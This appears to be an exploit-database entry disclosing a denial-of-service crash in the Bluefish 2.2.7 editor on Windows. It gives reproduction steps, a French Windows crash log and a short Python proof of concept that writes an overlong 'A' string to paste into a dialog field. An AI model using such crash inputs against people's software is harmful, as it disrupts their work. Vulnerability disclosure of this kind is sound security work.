-----------------------------------------------------
Exploit Title : bluefish - Denial Of Service Vulnerability
Date : 02/10/2015
Exploit Author : ZwX
Software Vendor : http://bluefish.openoffice.nl/index.html
Software Link: http://bluefish.openoffice.nl/download.html
Version: 2.2.7
Tested on: Windows 7
-----------------------------------------------------
---------------------------
* Solution - Fix & Patch: *
---------------------------
- Restrict the number of characters in input Image Location.
--------------------------------
* Steps to Produce the Crash: *
--------------------------------
- 1. Execute bluefish.exe
- 2. Copy the AAAA...string from bof.txt to clipboard
- 3. Go Menu -> Dialogues -> General -> Insert a thumbnail
- 4. Paste it the input Image Location AAAA....string click Ok
- 5. Software will Crash.
--------------------------------
* Crash Analysis Log: *
--------------------------------
Version=1
EventType=APPCRASH
EventTime=130882648896881549
ReportType=2
Consent=1
UploadTime=130882648898909553
ReportIdentifier=a05ea4cd-6906-11e5-b6d3-f42aa1418182
IntegratorReportIdentifier=a05ea4cc-6906-11e5-b6d3-f42aa1418182
Response.BucketId=906884289
Response.BucketTable=17
Response.type=4
Sig[0].Name=Nom de lâapplication
Sig[0].Value=bluefish.exe
Sig[1].Name=Version de lâapplication
Sig[1].Value=2.2.7.0
Sig[2].Name=Horodatage de lâapplication
Sig[2].Value=54cf7349
Sig[3].Name=Nom du module par défaut
Sig[3].Value=msvcrt.dll
Sig[4].Name=Version du module par défaut
Sig[4].Value=7.0.7601.17744
Sig[5].Name=Horodateur du module par défaut
Sig[5].Value=4eeaf722
Sig[6].Name=Code de lâexception
Sig[6].Value=c0000005
Sig[7].Name=DĂ©calage de lâexception
Sig[7].Value=0000dbba
DynamicSig[1].Name=Version du systĂšme
DynamicSig[1].Value=6.1.7601.2.1.0.768.3
DynamicSig[2].Name=Identificateur de paramÚtres régionaux
DynamicSig[2].Value=1036
DynamicSig[22].Name=Information supplémentaire n° 1
DynamicSig[22].Value=0a9e
DynamicSig[23].Name=Information supplémentaire n° 2
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
DynamicSig[24].Name=Information supplémentaire n° 3
DynamicSig[24].Value=0a9e
DynamicSig[25].Name=Information supplémentaire n° 4
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
UI[2]=C:\Program Files\Bluefish\bluefish.exe
UI[3]=Bluefish a cessé de fonctionner
UI[4]=Windows peut rechercher une solution au problĂšme en ligne.
UI[5]=Rechercher une solution en ligne et fermer le programme
UI[6]=Rechercher ultérieurement une solution en ligne et fermer le programme
UI[7]=Fermer le programme
LoadedModule[0]=C:\Program Files\Bluefish\bluefish.exe
LoadedModule[1]=C:\Windows\SYSTEM32\ntdll.dll
LoadedModule[2]=C:\Windows\system32\kernel32.dll
LoadedModule[3]=C:\Windows\system32\KERNELBASE.dll
LoadedModule[4]=C:\Windows\system32\ADVAPI32.DLL
LoadedModule[5]=C:\Windows\system32\msvcrt.dll
LoadedModule[6]=C:\Windows\SYSTEM32\sechost.dll
LoadedModule[7]=C:\Windows\system32\RPCRT4.dll
..... ..... ..... ..... ..... ..... ..... .....
State[0].Key=Transport.DoneStage1
State[0].Value=1
State[1].Key=DataRequest
State[1].Value=Bucket=906884289/nBucketTable=17/nResponse=1/n
FriendlyEventName=Fonctionnement arrĂȘtĂ©
ConsentKey=APPCRASH
AppName=Bluefish
AppPath=C:\Program Files\Bluefish\bluefish.exe
------------------------
* Proof Of Concept *
------------------------
buffer = "\x41"*8550
file = open("bluefish.txt","w")
file.write(buffer)
file.close()
print "POC Created by ZwX"
print " Email: [email protected]"
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation